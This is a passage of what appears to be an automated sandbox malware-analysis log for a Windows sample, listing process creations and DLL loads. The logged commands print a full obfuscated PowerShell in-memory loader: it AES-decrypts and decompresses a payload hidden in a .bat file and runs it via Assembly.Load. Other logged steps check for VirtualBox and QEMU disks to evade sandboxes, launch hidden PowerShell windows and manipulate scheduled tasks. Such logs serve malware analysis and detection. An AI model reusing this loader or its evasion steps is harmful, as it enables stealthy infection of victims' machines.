MWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
